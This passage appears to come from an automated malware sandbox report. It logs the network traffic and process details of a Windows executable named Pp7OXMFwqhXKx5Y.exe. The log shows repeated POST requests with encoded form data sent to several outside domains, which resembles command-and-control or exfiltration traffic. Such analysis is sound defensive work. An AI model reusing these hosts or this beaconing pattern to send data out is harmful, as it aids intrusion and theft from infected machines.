                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZUOT+l+AwI7GuF77nKmyibv4Uv9+HQZ9oUj/0+F+8o4qzdIEt36rh42pYe3+rrypy88c5I2xN4r+dx9EIcUrWx3haV+bFOjueYVTSsF0S6MbcYNvk8GgI/M7pUGdcybbVW7M3iZ1YXPrj2PwWXZikwQgQwh828Xa8BO+iIo54cRX+AZ70/qkDYg==
Dec 3, 2024 14:56:26.752474070 CET | 403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.11.20 | 49838 | 8.136.96.106 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:29.232840061 CET | 709 | OUT | POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
Dec 3, 2024 14:56:29.915668964 CET | 709 | OUT | POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=oLCQtEinuHrZWuD+idYwObGtA77nfWymbv0Uv8LcQqZoXDP0/Bq8lYqzWoEkz6rq42l6eyGrry9y8+05IGNKib+f5dEKR0rWx3haV+muOj2eYkjStk0d3sbfbNvktWgM/M6+UDh2ydHVW783iI1XCfqqpfxdQZXT5AYs8hdq1kiJN4z4VaNcfCLMEpCc9olYFlzxkyIL6lAviCkyCpQ510k=
Dec 3, 2024 14:56:30.246099949 CET | 403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:30 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.11.20 | 49839 | 8.136.96.106 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:32.128263950 CET | 2578 | OUT | POST /mia8/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.juewucangku.xyz
                                                                                                                                                                                                                                Referer: http://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Data Ascii: pluxVm= [TRUNCATED]
Dec 3, 2024 14:56:32.128324032 CET | 5280 | OUT |
                                                                                                                                                                                                                                Data Ascii: YKS4KFWpg4b3WoBcu+HjCaClWeMCy7F0C46W6SSRmLVDQtulPq5OWHnKEtWRCTG9QzBlvIQn/pknlhud77oocdeHO14HZgRY9OmTTPfWvxz361nYpzBWo43gpND05XwKGRqJO3cMB14+YLz+8SrW/uboGeWvI6EOaVpu3ujmZsOQBjz/aUwubrAWXar3/W0bY8rdoLtXsMWwKaqFvn4I8Mwl9GhvPuPcU6KYC2qPixF3dtzKeeX
Dec 3, 2024 14:56:32.490282059 CET | 403 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:32 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.11.20 | 49840 | 8.136.96.106 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:34.989713907 CET | 422 | OUT | GET /mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.juewucangku.xyz
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:56:35.326266050 CET | 546 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:35 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Location: https://www.juewucangku.xyz/mia8/?pluxVm=lJqwuwutw0TxfZ38sJgHJ7uqXbvMJU6pA/kgjN31XYZ5TRzvlECqmYueWqhH+dns4k5MWxqP8Bok6NcIC1536fve9u1GdSOEvFZBDrTYEySAKG7uhWgC+P8=&Z1EO=OvfHeluUy
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.11.20 | 49841 | 38.47.233.4 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:40.660944939 CET | 671 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZWGoKx2zAgBmnPCibIthmUnftVNpMV9V1Y5S4PpA3i25EtsJ1OrOED86OiiGUVCB93lcHZ6gRVszEPHuWjajgSRoMEM8pjXO4Fe9kGTMRCJkOoWu8YkydPjbY6pLGp1ifOBcKrBWRJK3Ig3RXHgWzPn5IgsFLCYNNsn6NkmXm+jp9xw0Ulsx7Q==
Dec 3, 2024 14:56:40.981194019 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:40 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
83 | 192.168.11.20 | 49842 | 38.47.233.4 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:56:43.502299070 CET | 691 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=mhpriNThPY9kZ0SoJQ2zXwBlrvCiRosqmUrftR9HMnZV15JS5OpA7C25ONsQ7uqAEDxPOnaGUVWB91tcGuGjQFs1LvHoLzajgSRoMEYSpjPO71O9kk7LKiJnJoWu34kMdPjDY7kgGsxifPxcJ6BZIZL8WQ2BUGQb2PTTHyYMKnArFaqgQWSzlt/b5BJcWntqmV2itsgj9Z/dQVd1PNg0HTU=
                                                                                                                                                                                                                                Dec 3, 2024 14:56:43.821299076 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:43 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                84 | 192.168.11.20 | 49843 | 38.47.233.4 | 80
                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346246958 CET | 5156 | OUT | POST /mg8c/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.nng83.top
                                                                                                                                                                                                                                Referer: http://www.nng83.top/mg8c/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm= [TRUNCATED]
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.346308947 CET | 2684 | OUT
                                                                                                                                                                                                                                Data Ascii: wsC6/XBqWBu+YQJ/1MMWn1ZfuB1KESSPDXEVPG6f2B5dXw9rXl8nqSCOi6a1VQaGkXj9pRhaPYaGVVmlDqre1xaXE5utx3iGMDZV//KhX9mzWra+hA1MdmpvLbX2LEdM7kjgHTgFI5wk1Yh95Gl2p46Ip61TEzFJACrvRZ+MntCTfa98pDA4WQ/4RiWGOq1J/XVLdaR6gw7isfc8agHSkfWhqAd+7Yhc5gvHLrZCrSZFXJ3vEF6
                                                                                                                                                                                                                                Dec 3, 2024 14:56:46.666198969 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:46 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                85 | 192.168.11.20 | 49844 | 38.47.233.4 | 80
                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.188229084 CET | 416 | OUT | GET /mg8c/?pluxVm=rjBLh9a8fZJRcQu9K1C3LAtp+/ShEoEfzH3ui2xMInNHtYlxt8Nl0C2ZPsNy1cCyYgBvBEXXCVeazEdoFLasWgZ3AJaOWiiv1TsNcWo9tyTPmHKnoGX/TSk=&Z1EO=OvfHeluUy HTTP/1.1
                                                                                                                                                                                                                                Host: www.nng83.top
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Dec 3, 2024 14:56:49.507761955 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Tue, 03 Dec 2024 13:56:49 GMT
                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                Content-Length: 146
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                86 | 192.168.11.20 | 49845 | 103.224.182.242 | 80
                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.692557096 CET | 689 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 203
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry0vgTcIuzg5vN37T/Pl+ADxoEQXM4UMTIc3n5TvqwZOf2eHShLE4YNwHhNcML2Oxi0qPv8nNnBIVN2oRCn34Zfk3Tr4GJIUBelwJQTPVvK//k1gvrIo0IQC40c1bohIsPrA19+adr2LYxb3qmkGqtaFbi1DNyPY8ISVLOgK9xlSd9sZpeIabnZA==
                                                                                                                                                                                                                                Dec 3, 2024 14:56:54.891254902 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:56:54 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234214.7907578; expires=Fri, 01-Dec-2034 13:56:54 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


                                                                                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                                87 | 192.168.11.20 | 49846 | 103.224.182.242 | 80
                                                                                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                Dec 3, 2024 14:56:57.395035982 CET | 709 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 223
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
                                                                                                                                                                                                                                Data Ascii: pluxVm=xZVxJZwsZmry1PwTTLWzr5vO9bT/B1+cDxsEQTVzU/nIcTj5SuqwYOf2WnSkUU5UNwLpNeIL2Oli0oXv/U1oHIVDt4RApX4Zfk3Tr5mzIUZelDRQCeVoJ//n9AvrC40EQC5Rc0HChKkPrFR9/Lds8LYzGnrG0mD/akiRjhBzXaMjXDGU94JVmBBPopQ2KYa8EKRdvH0/K/zRDQ8C9GJwC88=
Dec 3, 2024 14:56:57.592434883 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:56:57 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234217.8591296; expires=Fri, 01-Dec-2034 13:56:57 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.11.20 | 49847 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:57:00.097472906 CET | 2578 | OUT | POST /vwn2/ HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Origin: http://www.brickhills.site
                                                                                                                                                                                                                                Referer: http://www.brickhills.site/vwn2/
                                                                                                                                                                                                                                Content-Length: 7371
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Data Ascii: pluxVm= [TRUNCATED]
Dec 3, 2024 14:57:00.097537041 CET | 5156 | OUT | Data Raw: 2b 33 2b 6e 39 51 68 37 6f 46 2f 32 50 50 73 4c 44 67 75 70 32 65 6b 74 39 7a 58 32 6f 67 6a 77 65 6f 65 66 6f 35 67 6e 76 52 52 69 50 4b 68 76 53 74 74 56 2f 42 32 43 6b 5a 30 63 50 46 49 6d 42 36 6d 75 7a 54 52 49 6c 43 78 65 77 47 34 42 61 76
                                                                                                                                                                                                                                Data Ascii: +3+n9Qh7oF/2PPsLDgup2ekt9zX2ogjweoefo5gnvRRiPKhvSttV/B2CkZ0cPFImB6muzTRIlCxewG4BavWj4vZPPS4pejifR3iTJ1attUBLhYYgMq+0+qVyFTlLQAVp7xe2rVC6lO/iwnpXLLR1x204NIAJHLun05kRUmQpI1DBxu2e5g3f8gbIuQoI1iht6BCG2Swb+BMwevu6xy0JvCWepCc5FeSrApqcfp9BGvNYwg8Qqvu
Dec 3, 2024 14:57:00.097579002 CET | 124 | OUT | Data Raw: 52 73 78 35 7a 31 64 68 6b 31 66 67 6b 4f 71 6c 47 6a 33 46 4a 47 4c 66 54 53 46 47 54 41 33 35 56 76 4c 6d 48 55 59 66 32 77 67 47 71 6a 49 70 48 43 6f 6d 66 32 43 6f 71 74 36 7a 58 64 58 4f 78 4d 59 79 4c 56 4d 55 75 64 38 52 42 65 34 61 52 48
                                                                                                                                                                                                                                Data Ascii: Rsx5z1dhk1fgkOqlGj3FJGLfTSFGTA35VvLmHUYf2wgGqjIpHComf2Coqt6zXdXOxMYyLVMUud8RBe4aRH2TcQlEX8n91Iq/SoYlU556K4LxCSW7kkKpMulDjg==
Dec 3, 2024 14:57:00.284235001 CET | 874 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:57:00 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234220.8953293; expires=Fri, 01-Dec-2034 13:57:00 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                content-length: 579
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.11.20 | 49848 | 103.224.182.242 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:57:02.798958063 CET | 422 | OUT | GET /vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0= HTTP/1.1
                                                                                                                                                                                                                                Host: www.brickhills.site
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Android 5.1.1; Tablet; rv:41.0) Gecko/41.0 Firefox/41.0
Dec 3, 2024 14:57:02.993597984 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Tue, 03 Dec 2024 13:57:02 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                set-cookie: __tad=1733234222.2137467; expires=Fri, 01-Dec-2034 13:57:02 GMT; Max-Age=315360000
                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                content-length: 1501
                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Ascii: <html><head><title>brickhills.site</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#000000"><div style='display: non [TRUNCATED]
Dec 3, 2024 14:57:02.993669033 CET | 484 | IN | Data Raw: 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 69 63 6b 68 69 6c 6c 73 2e 73 69 74 65 2f 76 77 6e 32 2f 3f 5a 31 45 4f 3d 4f 76 66 48 65 6c 75 55 79 26 70 6c 75 78 56 6d 3d 38 62 39 52 4b 74 51 53 42 48 48 30 37 50 78 74 59 73 69
                                                                                                                                                                                                                                Data Ascii: a href='http://www.brickhills.site/vwn2/?Z1EO=OvfHeluUy&pluxVm=8b9RKtQSBHH07PxtYsipjL/lqfXqYX+jQmAZaw9GROHGYV74Mu7xY5rUUGbBS35lPyHtHPQD+8VPnbju2HtxZfcyuqMzjQoAFmm58sa9OXwe8h9QCPhjB/0=&fp=-3'>Click here to enter</a></div><noscript><meta http-e



                                                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                                                Start time:08:50:25
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                                                                                                                                                                                                                                Imagebase:0xda0000
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5 hash:8A6F66334502BC3DA28732CCD4353D14
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                                                Start time:08:50:40
                                                                                                                                                                                                                                Start date:03/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\Pp7OXMFwqhXKx5Y.exe"
                                                                                                                                                                                                                                Imagebase:0x850000
                                                                                                                                                                                                                                File size:766'976 bytes
                                                                                                                                                                                                                                MD5 hash:8A6F66334502BC3DA28732CCD4353D14
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
